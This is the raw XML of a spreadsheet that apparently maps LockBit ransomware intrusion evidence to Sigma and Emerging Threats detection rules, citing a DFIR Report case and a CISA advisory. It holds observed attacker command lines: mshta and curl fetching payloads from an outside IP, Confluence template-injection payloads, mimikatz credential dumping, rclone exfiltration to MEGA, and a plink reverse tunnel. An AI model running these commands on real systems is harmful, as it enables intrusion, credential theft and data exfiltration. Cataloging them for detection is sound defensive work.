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harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{B1E5A964-8E11-0E4F-B649-1813E1EA255C}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" activeTab="1" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet2" sheetId="2" r:id="rId1"/>
    <sheet name="sheet1" sheetId="1" r:id="rId2"/>
  </sheets>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="5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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="563" uniqueCount="295">
  <si>
    <t>eid</t>
  </si>
  <si>
    <t>map_pid</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>eid_type</t>
  </si>
  <si>
    <t>object</t>
  </si>
  <si>
    <t>lockbit-eid0001</t>
  </si>
  <si>
    <t>lockbit-eid0002</t>
  </si>
  <si>
    <t>lockbit-eid0003</t>
  </si>
  <si>
    <t>lockbit-eid0004</t>
  </si>
  <si>
    <t>lockbit-eid0005</t>
  </si>
  <si>
    <t>lockbit-eid0006</t>
  </si>
  <si>
    <t>lockbit-eid0007</t>
  </si>
  <si>
    <t>lockbit-eid0008</t>
  </si>
  <si>
    <t>lockbit-eid0009</t>
  </si>
  <si>
    <t>lockbit-eid0010</t>
  </si>
  <si>
    <t>lockbit-eid0011</t>
  </si>
  <si>
    <t>lockbit-eid0012</t>
  </si>
  <si>
    <t>lockbit-eid0013</t>
  </si>
  <si>
    <t>lockbit-eid0014</t>
  </si>
  <si>
    <t>lockbit-eid0015</t>
  </si>
  <si>
    <t>lockbit-eid0016</t>
  </si>
  <si>
    <t>lockbit-eid0017</t>
  </si>
  <si>
    <t>lockbit-eid0018</t>
  </si>
  <si>
    <t>lockbit-eid0019</t>
  </si>
  <si>
    <t>lockbit-eid0020</t>
  </si>
  <si>
    <t>lockbit-eid0021</t>
  </si>
  <si>
    <t>lockbit-eid0022</t>
  </si>
  <si>
    <t>lockbit-eid0023</t>
  </si>
  <si>
    <t>lockbit-eid0024</t>
  </si>
  <si>
    <t>lockbit-eid0025</t>
  </si>
  <si>
    <t>lockbit-eid0026</t>
  </si>
  <si>
    <t>lockbit-eid0027</t>
  </si>
  <si>
    <t>lockbit-eid0028</t>
  </si>
  <si>
    <t>lockbit-eid0029</t>
  </si>
  <si>
    <t>lockbit-eid0030</t>
  </si>
  <si>
    <t>lockbit-eid0031</t>
  </si>
  <si>
    <t>lockbit-eid0032</t>
  </si>
  <si>
    <t>lockbit-eid0033</t>
  </si>
  <si>
    <t>lockbit-eid0034</t>
  </si>
  <si>
    <t>lockbit-eid0035</t>
  </si>
  <si>
    <t>lockbit-eid0036</t>
  </si>
  <si>
    <t>lockbit-eid0037</t>
  </si>
  <si>
    <t>lockbit-eid0038</t>
  </si>
  <si>
    <t>lockbit-eid0039</t>
  </si>
  <si>
    <t>lockbit-eid0040</t>
  </si>
  <si>
    <t>lockbit-eid0041</t>
  </si>
  <si>
    <t>lockbit-eid0042</t>
  </si>
  <si>
    <t>lockbit-eid0043</t>
  </si>
  <si>
    <t>lockbit-eid0044</t>
  </si>
  <si>
    <t>lockbit-eid0045</t>
  </si>
  <si>
    <t>lockbit-eid0046</t>
  </si>
  <si>
    <t>lockbit-eid0047</t>
  </si>
  <si>
    <t>lockbit-eid0048</t>
  </si>
  <si>
    <t>lockbit-eid0049</t>
  </si>
  <si>
    <t>lockbit-eid0050</t>
  </si>
  <si>
    <t>lockbit-eid0051</t>
  </si>
  <si>
    <t>lockbit-eid0052</t>
  </si>
  <si>
    <t>lockbit-eid0053</t>
  </si>
  <si>
    <t>lockbit-eid0054</t>
  </si>
  <si>
    <t>lockbit-eid0055</t>
  </si>
  <si>
    <t>lockbit-eid0056</t>
  </si>
  <si>
    <t>lockbit-eid0057</t>
  </si>
  <si>
    <t>lockbit-eid0058</t>
  </si>
  <si>
    <t>lockbit-eid0059</t>
  </si>
  <si>
    <t>lockbit-eid0060</t>
  </si>
  <si>
    <t>lockbit-eid0061</t>
  </si>
  <si>
    <t>lockbit-eid0062</t>
  </si>
  <si>
    <t>lockbit-eid0063</t>
  </si>
  <si>
    <t>lockbit-eid0064</t>
  </si>
  <si>
    <t>lockbit-eid0065</t>
  </si>
  <si>
    <t>lockbit-eid0066</t>
  </si>
  <si>
    <t>lockbit-eid0067</t>
  </si>
  <si>
    <t>lockbit-eid0068</t>
  </si>
  <si>
    <t>lockbit-eid0069</t>
  </si>
  <si>
    <t>lockbit-eid0070</t>
  </si>
  <si>
    <t>lockbit-eid0071</t>
  </si>
  <si>
    <t>lockbit-eid0072</t>
  </si>
  <si>
    <t>lockbit-eid0073</t>
  </si>
  <si>
    <t>lockbit-eid0074</t>
  </si>
  <si>
    <t>lockbit-eid0075</t>
  </si>
  <si>
    <t>lockbit-eid0076</t>
  </si>
  <si>
    <t>lockbit-eid0077</t>
  </si>
  <si>
    <t>lockbit-eid0078</t>
  </si>
  <si>
    <t>lockbit-eid0079</t>
  </si>
  <si>
    <t>lockbit-eid0080</t>
  </si>
  <si>
    <t>lockbit-eid0081</t>
  </si>
  <si>
    <t>lockbit-eid0082</t>
  </si>
  <si>
    <t>lockbit-eid0083</t>
  </si>
  <si>
    <t>lockbit-eid0084</t>
  </si>
  <si>
    <t>lockbit-eid0085</t>
  </si>
  <si>
    <t>lockbit-eid0086</t>
  </si>
  <si>
    <t>lockbit-eid0087</t>
  </si>
  <si>
    <t>lockbit-eid0088</t>
  </si>
  <si>
    <t>lockbit-eid0089</t>
  </si>
  <si>
    <t>lockbit-eid0090</t>
  </si>
  <si>
    <t>lockbit-eid0091</t>
  </si>
  <si>
    <t>lockbit-eid0092</t>
  </si>
  <si>
    <t>lockbit-eid0093</t>
  </si>
  <si>
    <t>lockbit-eid0094</t>
  </si>
  <si>
    <t>lockbit-eid0095</t>
  </si>
  <si>
    <t>lockbit-eid0096</t>
  </si>
  <si>
    <t>lockbit-eid0097</t>
  </si>
  <si>
    <t>lockbit-eid0098</t>
  </si>
  <si>
    <t>lockbit-eid0099</t>
  </si>
  <si>
    <t>lockbit-eid0100</t>
  </si>
  <si>
    <t>lockbit-eid0101</t>
  </si>
  <si>
    <t>lockbit-eid0102</t>
  </si>
  <si>
    <t>lockbit-eid0103</t>
  </si>
  <si>
    <t>lockbit-eid0104</t>
  </si>
  <si>
    <t>lockbit-eid0105</t>
  </si>
  <si>
    <t>lockbit-eid0106</t>
  </si>
  <si>
    <t>lockbit-eid0107</t>
  </si>
  <si>
    <t>lockbit-eid0108</t>
  </si>
  <si>
    <t>lockbit-eid0109</t>
  </si>
  <si>
    <t>lockbit-eid0110</t>
  </si>
  <si>
    <t>lockbit-eid0111</t>
  </si>
  <si>
    <t>lockbit-eid0112</t>
  </si>
  <si>
    <t>lockbit-eid0113</t>
  </si>
  <si>
    <t>lockbit-eid0114</t>
  </si>
  <si>
    <t>lockbit-eid0115</t>
  </si>
  <si>
    <t>lockbit-eid0116</t>
  </si>
  <si>
    <t>lockbit-eid0117</t>
  </si>
  <si>
    <t>lockbit-eid0118</t>
  </si>
  <si>
    <t>lockbit-eid0119</t>
  </si>
  <si>
    <t>lockbit-eid0120</t>
  </si>
  <si>
    <t>lockbit-eid0121</t>
  </si>
  <si>
    <t>lockbit-eid0122</t>
  </si>
  <si>
    <t>lockbit-eid0123</t>
  </si>
  <si>
    <t>lockbit-eid0124</t>
  </si>
  <si>
    <t>{"process_command_line": "mshta http://92.51.2.22:443/UsySLX1n.hta",  "process_name": "mshta.exe", "initiating_process_name": "tomcat9.exe"}</t>
  </si>
  <si>
    <t>{"process_command_line": "mshta http://92.51.2.22:443/TNillGnQ.hta"}</t>
  </si>
  <si>
    <t>{"process_command_line": "net user", "initiating_process_file_name": "tomcat9.exe", "account_name": "NETWORK SERVICE"}</t>
  </si>
  <si>
    <t>{"process_command_line": "whoami", "initiating_process_file_name": "tomcat9.exe", "account_name": "NETWORK SERVICE"}</t>
  </si>
  <si>
    <t>{"process_command_line": "query user", "initiating_process_file_name": "tomcat9.exe", "account_name": "NETWORK SERVICE"}</t>
  </si>
  <si>
    <t>{"process_command_line": "curl http://92.51.2.22:8088/AnyDesk.msi -OutFile AnyDesk.msi"}</t>
  </si>
  <si>
    <t>{"http_post": "/template/aui/text-inline.vm HTTP/1.1", "http_user_agent": "python-requests/2.25.1"}</t>
  </si>
  <si>
    <t>{"http_post": "/template/aui/text-inline.vm HTTP/1.1", "http_user_agent": "python-requests/2.25.1", "http_content": "write((new freemarker.temlate.utility.Execute()).exec({\"whoami\"}))"}</t>
  </si>
  <si>
    <t>{"http_post": "/template/aui/text-inline.vm HTTP/1.1", "http_user_agent": "python-requests/2.25.1", "http_content": "write((new freemarker.temlate.utility.Execute()).exec({\"net user\"}))"}</t>
  </si>
  <si>
    <t>{"http_post": "/template/aui/text-inline.vm HTTP/1.1", "http_user_agent": "python-requests/2.25.1", "http_content": "write((new freemarker.temlate.utility.Execute()).exec({\"query user\"}))"}</t>
  </si>
  <si>
    <t>{"process_command_line": "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e &lt;encoded string&gt;",  "process_name": "powershell.exe", "initiating_process_name": "mshta.exe"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_name": "C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\IE\UsySLX1n[1].hta", "initiating_file_name": "mshta.exe"}</t>
  </si>
  <si>
    <t>{"process_command_line": "powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi', 'AnyDesk.msi')"}</t>
  </si>
  <si>
    <t>{"process_command_line": "net user &lt;accountname&gt; &lt;password&gt; /add"}</t>
  </si>
  <si>
    <t>{"process_command_line": "net localgroup &lt;accountname&gt;  /add"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\Win32\mimidrv.sys"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\Win32\mimikatz.exe"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\Win32\mimilib.dll"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\Win32\mimilove.exe"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\Win32\mimispool.dll"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\rclone\rclone.exe"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\pdq.exe"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\scanner\netscan.exe"}</t>
  </si>
  <si>
    <t>{"process_command_line": "wevutil el"}</t>
  </si>
  <si>
    <t>{"process_command_line": "wevutil cl &lt;log name&gt;"}</t>
  </si>
  <si>
    <t>{"obj_type": "process_access", "initiating_process_file_name": "mimikatz.exe", "file_name": "lsass.exe", "access_grant": "0x1010"}</t>
  </si>
  <si>
    <t>{"process_command_line": "powershell -f  Veeam-Get-Creds-New.ps1"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\x64\passwords.txt", "initiating_file_name": "mimikatz.exe"}</t>
  </si>
  <si>
    <t>{"process_command_line": "taskkill /f"}</t>
  </si>
  <si>
    <t>{"process_command_line": "taskkill /im"}</t>
  </si>
  <si>
    <t>{"process_command_line": "tasklist"}</t>
  </si>
  <si>
    <t>{"process_command_line": "query user", "device_type": "domain controller"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_name": "delete.me"}</t>
  </si>
  <si>
    <t>When NetScan is Executed with 'Check for write access' option enabled 'delete.me' file is created then deleted</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "netscan.exe"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "netscan.lic"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "netscan.xml"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\x64\mimidrv.sys"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\x64\mimikatz.exe"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\x64\mimilib.dll"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\x64\mimilove.exe"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\mimikatz\x64\mimispool.dll"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\LBB.exe"}</t>
  </si>
  <si>
    <t>Lockbit binary</t>
  </si>
  <si>
    <t>{"process_command_line": "rclone --config=rclone.conf copy c:\&lt;directory&gt; mega:FTP"}</t>
  </si>
  <si>
    <t>{"http_post": "/template/aui/text-inline.vm HTTP/1.1", "http_user_agent": "rclone/v1.64.2", "http_host": "&lt;random&gt;.userstorage.mega.co.nz"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\pdq.exe", "initiating_file_name": "AnyDeskMSI.exe"}</t>
  </si>
  <si>
    <t>{"obj_type": "file_created", "file_path": "C:\temp\LBB.exe", "initiating_file_name": "AnyDeskMSI.exe"}</t>
  </si>
  <si>
    <t>{"process_command_line": "cmd.exe /s / asd.bat"}</t>
  </si>
  <si>
    <t>{"process_command_line": "start cmd /k \"C:\temp\LBB.exe -path \"\\&lt;host&gt;\C$"}</t>
  </si>
  <si>
    <t>etpro</t>
  </si>
  <si>
    <t>sigma</t>
  </si>
  <si>
    <t>7d9263bd-dc47-4a58-bc92-5474abab390c    :       Change Winevt Channel Access Permission Via Registry</t>
  </si>
  <si>
    <t>2f78da12-f7c7-430b-8b19-a28f269b77a3    :       Disable Windows Event Logging Via Registry</t>
  </si>
  <si>
    <t>fcddca7c-b9c0-4ddf-98da-e1e2d18b0157    :       Disabled Windows Defender Eventlog</t>
  </si>
  <si>
    <t>61065c72-5d7d-44ef-bf41-6a36684b545f    :       Elevated System Shell Spawned</t>
  </si>
  <si>
    <t>98767d61-b2e8-4d71-b661-e36783ee24c1    :       Gzip Archive Decode Via PowerShell</t>
  </si>
  <si>
    <t>a642964e-bead-4bed-8910-1bb4d63e3b4d    :       HackTool - Mimikatz Execution</t>
  </si>
  <si>
    <t>502b42de-4306-40b4-9596-6f590c81f073    :       Local Accounts Discovery</t>
  </si>
  <si>
    <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0    :       Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
  </si>
  <si>
    <t>183e7ea8-ac4b-4c23-9aec-b3dac4e401ac    :       Net.EXE Execution</t>
  </si>
  <si>
    <t>cd219ff3-fa99-45d4-8380-a7d15116c6dc    :       New User Created Via Net.EXE</t>
  </si>
  <si>
    <t>f4bbd493-b796-416e-bbf2-121235348529    :       Non Interactive PowerShell Process Spawned</t>
  </si>
  <si>
    <t>d679950c-abb7-43a6-80fb-2a480c4fc450    :       PDQ Deploy Remote Adminstartion Tool Execution</t>
  </si>
  <si>
    <t>d7bcd677-645d-4691-a8d4-7a5602b780d1    :       Potential PowerShell Command Line Obfuscation</t>
  </si>
  <si>
    <t>8e0bb260-d4b2-4fff-bb8d-3f82118e6892    :       Potentially Suspicious CMD Shell Output Redirect</t>
  </si>
  <si>
    <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c    :       PowerShell Base64 Encoded FromBase64String Cmdlet</t>
  </si>
  <si>
    <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7    :       PowerShell Download Pattern</t>
  </si>
  <si>
    <t>6e897651-f157-4d8f-aaeb-df8151488385    :       PowerShell Web Download</t>
  </si>
  <si>
    <t>86085955-ea48-42a2-9dd3-85d4c36b167d    :       Process Terminated Via Taskkill</t>
  </si>
  <si>
    <t>b52e84a3-029e-4529-b09b-71d19dd27e94    :       Remote Access Tool - AnyDesk Execution</t>
  </si>
  <si>
    <t>b98d0db6-511d-45de-ad02-e82a98729620    :       Remotely Hosted HTA File Executed Via Mshta.EXE</t>
  </si>
  <si>
    <t>2aa0a6b4-a865-495b-ab51-c28249537b75    :       Startup Folder File Write</t>
  </si>
  <si>
    <t>88872991-7445-4a22-90b2-a3adadb0e827    :       Stop Windows Service Via Net.EXE</t>
  </si>
  <si>
    <t>590a5f4c-6c8c-4f10-8307-89afe9453a9d    :       Suspicious Child Process Created as System</t>
  </si>
  <si>
    <t>7be5fb68-f9ef-476d-8b51-0256ebece19e    :       Suspicious Execution of Hostname</t>
  </si>
  <si>
    <t>fb843269-508c-4b76-8b8d-88679db22ce7    :       Suspicious Execution of Powershell with Base64</t>
  </si>
  <si>
    <t>5cb299fc-5fb1-4d07-b989-0644c68b6043    :       Suspicious File Download From IP Via Curl.EXE</t>
  </si>
  <si>
    <t>d75d6b6b-adb9-48f7-824b-ac2e786efe1f    :       Suspicious FromBase64String Usage On Gzip Archive - Process Creation</t>
  </si>
  <si>
    <t>03cc0c25-389f-4bf8-b48d-11878079f1ca    :       Suspicious MSHTA Child Process</t>
  </si>
  <si>
    <t>754ed792-634f-40ae-b3bc-e0448d33f695    :       Suspicious PowerShell Parent Process</t>
  </si>
  <si>
    <t>2617e7ed-adb7-40ba-b0f3-8f9945fe6c09    :       Suspicious SYSTEM User Process Creation</t>
  </si>
  <si>
    <t>63332011-f057-496c-ad8d-d2b6afb27f96    :       Suspicious Tasklist Discovery Command</t>
  </si>
  <si>
    <t>ce72ef99-22f1-43d4-8695-419dcb5d9330    :       Suspicious Windows Service Tampering</t>
  </si>
  <si>
    <t>d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6    :       Unusually Long PowerShell CommandLine</t>
  </si>
  <si>
    <t>e28a5a99-da44-436d-b7a0-2afc20a5f413    :       Whoami Utility Execution</t>
  </si>
  <si>
    <t>8de1cbe8-d6f5-496d-8237-5f44a721c7a0    :       Whoami.EXE Execution Anomaly</t>
  </si>
  <si>
    <t>79ce34ca-af29-4d0e-b832-fc1b377020db    :       Whoami.EXE Execution From Privileged Process</t>
  </si>
  <si>
    <t>671bb7e3-a020-4824-a00e-2ee5b55f385e    :       WMI Module Loaded By Uncommon Process</t>
  </si>
  <si>
    <t>{"date": "2023-11" , "url": "https://www.cisa.gov/sites/default/files/2023-11/aa23-325a_lockbit_3.0_ransomware_affiliates_exploit_cve-2023-4966_citrix_bleed_vulnerability_0.pdf", "tags": ["lockbit"]}</t>
  </si>
  <si>
    <t>echo enter |c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 &lt;username&gt;@168.100.9[.]137 -pw &lt;password&gt;</t>
  </si>
  <si>
    <t>plink forwarding</t>
  </si>
  <si>
    <t>cmdline</t>
  </si>
  <si>
    <t>c:\windows\servicehost.exe</t>
  </si>
  <si>
    <t>plink renamed</t>
  </si>
  <si>
    <t>screenconnect</t>
  </si>
  <si>
    <t>splashtop</t>
  </si>
  <si>
    <t>zoho assist</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t xml:space="preserve">fixme it </t>
  </si>
  <si>
    <t>anydesk</t>
  </si>
  <si>
    <t>atera</t>
  </si>
  <si>
    <t>action1</t>
  </si>
  <si>
    <t>psexec</t>
  </si>
  <si>
    <t>adrecon</t>
  </si>
  <si>
    <t>impacket</t>
  </si>
  <si>
    <t>secretsdump.py</t>
  </si>
  <si>
    <t>veeam-get-creds.ps1</t>
  </si>
  <si>
    <t>procdump</t>
  </si>
  <si>
    <t>mimikatz</t>
  </si>
  <si>
    <t xml:space="preserve">c:\perflogs\lsass.dmp </t>
  </si>
  <si>
    <t xml:space="preserve">c:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exe </t>
  </si>
  <si>
    <t>c:\perflogs\processhacker.exe</t>
  </si>
  <si>
    <t>c:\users\&lt;username&gt;\downloads\process hacker 2\peview.exe</t>
  </si>
  <si>
    <t>secretsdump.py &lt;domain&gt;/&lt;username&gt;@&lt;ip&gt; -outputfile 1</t>
  </si>
  <si>
    <t>cmd.exe /q /c cd\ 1&gt; \\127.0.0.1\admin$\__1698618133[.]54 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex</t>
  </si>
  <si>
    <t>cmd.exe /q /c query user 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /q /c cd\ 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /q /c cd 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1</t>
  </si>
  <si>
    <t>SoftPerfect NetScan</t>
  </si>
  <si>
    <t xml:space="preserve">AnyDeskMSI.exe </t>
  </si>
  <si>
    <t xml:space="preserve">SRUtility.exe </t>
  </si>
  <si>
    <t>Splashtop</t>
  </si>
  <si>
    <t>Plink</t>
  </si>
  <si>
    <t>Teamviewer</t>
  </si>
  <si>
    <t>{"obj_type": "cmdline", "initiating_process_path": "c:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe", "process_cmdline": "cmd.exe /c /s asd.bat"}</t>
  </si>
  <si>
    <t>PDQDeployService.exe is the background service that manages all schedules and deployments on the console.</t>
  </si>
  <si>
    <t>c:\Program Files (x86)\Admin Arsenal\PDQ Deploy\PDQDeployService.exe</t>
  </si>
  <si>
    <t>file_path</t>
  </si>
  <si>
    <t>PDQDeployRunner-n (e.g., PDQDeployRunner-1) is the target service executed on remote hosts to perform the deployments.</t>
  </si>
  <si>
    <t>%windir%\AdminArsenal\PDQDeployRunner\PDQDeployRunner\service-1\PDQDeployRunner-1.exe</t>
  </si>
  <si>
    <t>file_name</t>
  </si>
  <si>
    <t xml:space="preserve">Mistyped </t>
  </si>
  <si>
    <t>{"object": "process", "process_command_line": "net group \"domain admins\" .domain", "device_type": "domain controller"}</t>
  </si>
  <si>
    <t>{"object": "process", "process_command_line": "net group \"domain admins" /domain", "device_type": "domain controller"}</t>
  </si>
  <si>
    <t>mshta-pid</t>
  </si>
  <si>
    <t>netclt-pid</t>
  </si>
  <si>
    <t>whoami-pid</t>
  </si>
  <si>
    <t>qusr-pid</t>
  </si>
  <si>
    <t>anydesk-pid, curl-pid</t>
  </si>
  <si>
    <t>anydesk-pid, pshell-pid</t>
  </si>
  <si>
    <t>mimikatz-pid</t>
  </si>
  <si>
    <t>rclone-pid</t>
  </si>
  <si>
    <t>pdq-pid</t>
  </si>
  <si>
    <t>netscan-pid</t>
  </si>
  <si>
    <t>netclit-pid</t>
  </si>
  <si>
    <t>anydesk-pid, pdq-pid</t>
  </si>
  <si>
    <t>anydesk-pid</t>
  </si>
  <si>
    <t>cmd-pid</t>
  </si>
  <si>
    <t>psexec-pid</t>
  </si>
  <si>
    <t>e32d4572-9826-4738-b651-95fa63747e8a : Base64 Encoded PowerShell Command Detected</t>
  </si>
  <si>
    <t>cd951fdc-4b2f-47f5-ba99-a33bf61e3770 : Always Install Elevated Windows Installer</t>
  </si>
  <si>
    <t>ET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1
ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers
ET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1
ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
ET HUNTING PE EXE Download over raw TCP
ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1
ET INFO Dotted Quad Host HTA Request
ET INFO User-Agent (python-requests) Inbound to Webserver
ET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)
ET POLICY Possible HTA Application Download
ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
ET WEB_CLIENT PowerShell call in script 1
ET WEB_CLIENT PowerShell call in script 2
ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request Body
ET WEB_SERVER WebShell Generic - net user
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1
ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2
ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1
ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)
ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard Ports
ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP
ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>curl-pid</t>
  </si>
  <si>
    <t>procdump-pid</t>
  </si>
  <si>
    <t>lsass-pid</t>
  </si>
  <si>
    <t>teamvwr-pid</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of map_pid</t>
  </si>
  <si>
    <t>Count of eid_type</t>
  </si>
  <si>
    <t>{"date": "2025-02" , "url": "https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/", "tags": ["lockbit"]}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</si>
</sst>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1"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70.329533217591" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="124" xr:uid="{0610AF1D-840C-3042-A821-D069726C567D}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="6">
    <cacheField name="eid" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="map_pid" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="eid_type" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="4">
        <s v="{&quot;date&quot;: &quot;2025-02&quot; , &quot;url&quot;: &quot;https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/&quot;, &quot;tags&quot;: [&quot;lockbit&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2023-11&quot; , &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2023-11/aa23-325a_lockbit_3.0_ransomware_affiliates_exploit_cve-2023-4966_citrix_bleed_vulnerability_0.pdf&quot;, &quot;tags&quot;: [&quot;lockbit&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2025-02-24&quot; , &quot;url&quot;: &quot;https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/&quot;, &quot;tags&quot;: [&quot;lockbit&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2025-02&quot; , &quot;url&quot;: &quot;https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/&quot;, &quot;tags&quot;: &quot;lockbit&quo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lockbit-eid0001"/>
    <s v="mshta-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;mshta http://92.51.2.22:443/UsySLX1n.hta&quot;,  &quot;process_name&quot;: &quot;mshta.exe&quot;, &quot;initiating_process_name&quot;: &quot;tomcat9.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0002"/>
    <s v="mshta-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;mshta http://92.51.2.22:443/TNillGnQ.hta&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0003"/>
    <s v="netclt-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;net user&quot;, &quot;initiating_process_file_name&quot;: &quot;tomcat9.exe&quot;, &quot;account_name&quot;: &quot;NETWORK SERVICE&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0004"/>
    <s v="whoami-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;whoami&quot;, &quot;initiating_process_file_name&quot;: &quot;tomcat9.exe&quot;, &quot;account_name&quot;: &quot;NETWORK SERVICE&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0005"/>
    <s v="qusr-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;query user&quot;, &quot;initiating_process_file_name&quot;: &quot;tomcat9.exe&quot;, &quot;account_name&quot;: &quot;NETWORK SERVICE&quot;}"/>
    <m/>
